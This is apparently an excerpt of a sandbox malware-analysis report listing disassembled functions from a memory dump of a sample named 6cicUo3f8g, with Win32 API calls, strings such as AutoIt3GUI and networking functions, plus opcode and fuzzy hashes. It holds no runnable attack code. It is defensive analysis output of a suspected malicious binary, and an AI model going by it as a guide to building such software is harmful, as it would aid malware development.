                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: aa3b3d487a9b111d34be745ac3c5183076c3d9d14b0044964eff49f394e0027e
                                                                                                                • Instruction ID: 5185ded403e1038cdc2d6dd60328f1174e1491704eb2b94dea852e8c4e49a026
                                                                                                                • Opcode Fuzzy Hash: aa3b3d487a9b111d34be745ac3c5183076c3d9d14b0044964eff49f394e0027e
                                                                                                                • Instruction Fuzzy Hash: 00E08637629312ABD7205FB07D1CB5B3BACEF507D1F14482CF246DA040DA748445DB50
                                                                                                                APIs
                                                                                                                • __getptd_noexit.LIBCMT ref: 00905DAD
                                                                                                                  • Part of subcall function 009099C4: GetLastError.KERNEL32(00000000,00900DD3,00908B2D,009057A3,?,?,00900DD3,?), ref: 009099C6
                                                                                                                  • Part of subcall function 009099C4: __calloc_crt.LIBCMT ref: 009099E7
                                                                                                                  • Part of subcall function 009099C4: __initptd.LIBCMT ref: 00909A09
                                                                                                                  • Part of subcall function 009099C4: GetCurrentThreadId.KERNEL32 ref: 00909A10
                                                                                                                  • Part of subcall function 009099C4: SetLastError.KERNEL32(00000000,00900DD3,?), ref: 00909A28
                                                                                                                • CloseHandle.KERNEL32(?,?,00905D8C), ref: 00905DC1
                                                                                                                • __freeptd.LIBCMT ref: 00905DC8
                                                                                                                • ExitThread.KERNEL32 ref: 00905DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                                • String ID:
                                                                                                                • API String ID: 4169687693-0
                                                                                                                • Opcode ID: 37421898b5c62199d314ace89b45769ce952f7eaebdc7eb3006e20c3e2f7d2e5
                                                                                                                • Instruction ID: 8b1d239d5ae3001df5671bdc3a1e19d8f9acc459657bb2d8d457dc83286eab4e
                                                                                                                • Opcode Fuzzy Hash: 37421898b5c62199d314ace89b45769ce952f7eaebdc7eb3006e20c3e2f7d2e5
                                                                                                                • Instruction Fuzzy Hash: 2ED0A931002F228FC2322730AC1EB2A7B58AF00BA1F05822DF0B6452F19B6098028E82
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0093B4BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                • Opcode ID: c497705f053769cedaf7ada2a40068aaa98442a8c4b58240a7e78d6c823df792
                                                                                                                • Instruction ID: d5b7b738b1d13bffe2a86bae1e655d694192803a7dfa3b8f344da407ae466f1a
                                                                                                                • Opcode Fuzzy Hash: c497705f053769cedaf7ada2a40068aaa98442a8c4b58240a7e78d6c823df792
                                                                                                                • Instruction Fuzzy Hash: 2C910871600601AFDB14DF68C884B6AB7E9FF49710F24856DFA4ACB6A1DB71E841CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • __wcsnicmp.LIBCMT ref: 0094B02D
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0094B0F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                • String ID: LPT
                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                • Opcode ID: c7a30297d3f27fc0958531c131e73e41f0b500bc7a28e62bc68a62f674881668
                                                                                                                • Instruction ID: 45d4c4f0a59f7bfc3f7ce8fa8938136ef3ab13f6d52dabda6eee394ef23ea4d8
                                                                                                                • Opcode Fuzzy Hash: c7a30297d3f27fc0958531c131e73e41f0b500bc7a28e62bc68a62f674881668
                                                                                                                • Instruction Fuzzy Hash: 6A618175A04219AFCB14DF98C891EAEB7B8FF49310F104069F95AAB2A1D774EE40CB51
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 008F2968
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 008F2981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: a78e990147d51fad28318f2287603fbf6c87fb8b60b103b5b6141c83e9662c27
                                                                                                                • Instruction ID: 0aa87815fa08aa3a984c3531f5166ae885499df5b09f9fa9fc4daaf1d1775b41
                                                                                                                • Opcode Fuzzy Hash: a78e990147d51fad28318f2287603fbf6c87fb8b60b103b5b6141c83e9662c27
                                                                                                                • Instruction Fuzzy Hash: 5E515971418785ABD320EF15D886BAFBBE8FF86340F42485DF2D8811A1DB718528CB67
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4F0B: __fread_nolock.LIBCMT ref: 008E4F29
                                                                                                                • _wcscmp.LIBCMT ref: 00949824
                                                                                                                • _wcscmp.LIBCMT ref: 00949837
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                • String ID: FILE
                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                • Opcode ID: 0e25ba76f870de6c0daa1fc75fcdcf0d4ae11439c2fd859a6e98ad248894d083
                                                                                                                • Instruction ID: a15b6ce906eaf9881ad54309a4fd0192cff78dab3b32ce4a5c626e382ed2649e
                                                                                                                • Opcode Fuzzy Hash: 0e25ba76f870de6c0daa1fc75fcdcf0d4ae11439c2fd859a6e98ad248894d083
                                                                                                                • Instruction Fuzzy Hash: 5641D771A0420ABADF209BA9CC45FEFBBBDEF86714F000469F904E7181DA719A048B61
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0095259E
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009525D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: |
                                                                                                                • API String ID: 1413715105-2343686810
                                                                                                                • Opcode ID: ea3929885294bc9d504e2d081b7b87d82cf85c92ee696ccb2e7e9b9f3a4810f1
                                                                                                                • Instruction ID: bc305aa1bbc15484f643fc53cea3b793ca1bc6ac4a95162af3bced6c1018d1a5
                                                                                                                • Opcode Fuzzy Hash: ea3929885294bc9d504e2d081b7b87d82cf85c92ee696ccb2e7e9b9f3a4810f1
                                                                                                                • Instruction Fuzzy Hash: C2311471801159ABCF01EFA6CC85EEEBFB8FF09310F10006AFD14A6162EA315956DB61
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00967B61
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00967B76
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: d270022b2dfd7f133e785c2d92f8283f24b7975811d0a6f5185873273c97e5d4
                                                                                                                • Instruction ID: e6f84f0bccca294b3b06b0c25b10d3e73191d0f6fef9468a23013cc8f0aa583f
                                                                                                                • Opcode Fuzzy Hash: d270022b2dfd7f133e785c2d92f8283f24b7975811d0a6f5185873273c97e5d4
                                                                                                                • Instruction Fuzzy Hash: 4D411B74A053099FDB14CFA8C881BEABBB9FF09304F10016AE904EB391D770A951CF90
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00966B17
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00966B53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 58550accba7209a9cb688855800b589b7a1e502ef327784aa8faa8731cb80023
                                                                                                                • Instruction ID: 16e691f840144c817cc61c91c66427e10271a9908750f38738a558e0954858f9
                                                                                                                • Opcode Fuzzy Hash: 58550accba7209a9cb688855800b589b7a1e502ef327784aa8faa8731cb80023
                                                                                                                • Instruction Fuzzy Hash: 89318D71210604AEDB109F79DC80BFB77ADFF88760F109619F9A5D7190DA70AC81DB60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942911
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0094294C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 229015e5c629c3086509178d074ab31d177106070620119f7fb6519d7f8c9f31
                                                                                                                • Instruction ID: 53d2e40a57ca799e3162a91def56c0e98cda95e8d4da814422b62add3928198f
                                                                                                                • Opcode Fuzzy Hash: 229015e5c629c3086509178d074ab31d177106070620119f7fb6519d7f8c9f31
                                                                                                                • Instruction Fuzzy Hash: 5431D231600309DFEB24CF58CA85FAEBBF8FF45350F540129F985A62A0E7709940CB51
                                                                                                                APIs
                                                                                                                • __snwprintf.LIBCMT ref: 00953A66
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                • API String ID: 3506404897-2584243854
                                                                                                                • Opcode ID: d1d308f4fdddb5d7224b71ec2646ff2e16559f694f428a4b97af7958fc16a0f9
                                                                                                                • Instruction ID: 44a09d6aff63fa797b3926c6b4182633d75212a917a95ca6d9624174b1fc6f91
                                                                                                                • Opcode Fuzzy Hash: d1d308f4fdddb5d7224b71ec2646ff2e16559f694f428a4b97af7958fc16a0f9
                                                                                                                • Instruction Fuzzy Hash: B6217131604219AFCF10EFA9CC82AAE77B9FF86741F504458F945E7181DB30EA45CB66
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00966761
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0096676C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 316a265d1cc18e4aaaa6721ab1927ecf03f229c44f70f89912cdbedb356e9d6e
                                                                                                                • Instruction ID: 44c9bf6c4b9574ebea8a928e0aabfded8db8a42d9cdeda8588c2c72733d0a3a2
                                                                                                                • Opcode Fuzzy Hash: 316a265d1cc18e4aaaa6721ab1927ecf03f229c44f70f89912cdbedb356e9d6e
                                                                                                                • Instruction Fuzzy Hash: B511BF71300208AFEF218F58DC80EAB3B6EEB883A8F110129F918D7290D6759C5197A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
                                                                                                                  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
                                                                                                                  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00966C71
                                                                                                                • GetSysColor.USER32(00000012), ref: 00966C8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: b27d2f67305c0a9af5a52a33d3cec96ef0c29727c400b1dd3cd3e524b415bfd7
                                                                                                                • Instruction ID: 54f25ac410ab9d18ab4c47b8ff14af6acf7130f4e1076755ed8b0ec08bd68833
                                                                                                                • Opcode Fuzzy Hash: b27d2f67305c0a9af5a52a33d3cec96ef0c29727c400b1dd3cd3e524b415bfd7
                                                                                                                • Instruction Fuzzy Hash: 2B212972624209AFDF04DFA8DC45AFA7BA8FB08314F014629FA95D2250D675E850EB60
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 009669A2
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009669B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: d124ef50be1394b5a826258d5199b53ecda9539a5c82ab2bd6e67371fbd8782e
                                                                                                                • Instruction ID: 3825c420dd58944c416b7f71b437d9237df734f94f4aa5a2330281adba789b81
                                                                                                                • Opcode Fuzzy Hash: d124ef50be1394b5a826258d5199b53ecda9539a5c82ab2bd6e67371fbd8782e
                                                                                                                • Instruction Fuzzy Hash: 1A118C71114208ABEF108E74DC54AEB3BADEB053B8F504728FDA5A71E0C775DC90ABA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942A22
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00942A41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 40c2903d113c69756689a680e13f72fc170040b52235e2694346afd57ad20ba4
                                                                                                                • Instruction ID: 21033579f552b919fe37afb55c1f4c8df26efb4752d45e592613ea14d80ee5fa
                                                                                                                • Opcode Fuzzy Hash: 40c2903d113c69756689a680e13f72fc170040b52235e2694346afd57ad20ba4
                                                                                                                • Instruction Fuzzy Hash: 8211D032A15214ABCB38DF98D844FAAB3BCBB46304F854021FD55E72D0D770AD4AC791
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095222C
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00952255
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: d76f189399cb1a5bc319e2ded856c0ff581b9a0352d83ebf066263f0d8f6781e
                                                                                                                • Instruction ID: c16fb284752c9f1dc136eec3073d19a73bd2f5517e7eef5b8a50f70043c5da53
                                                                                                                • Opcode Fuzzy Hash: d76f189399cb1a5bc319e2ded856c0ff581b9a0352d83ebf066263f0d8f6781e
                                                                                                                • Instruction Fuzzy Hash: CE110274605225BADB28CF128C84EBBFBACFF17352F10862AFD2486000D2706888D7F0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00957FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00957DB3,?,00000000,?,?), ref: 0095800D
                                                                                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
                                                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 00957DF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 2496851823-2422070025
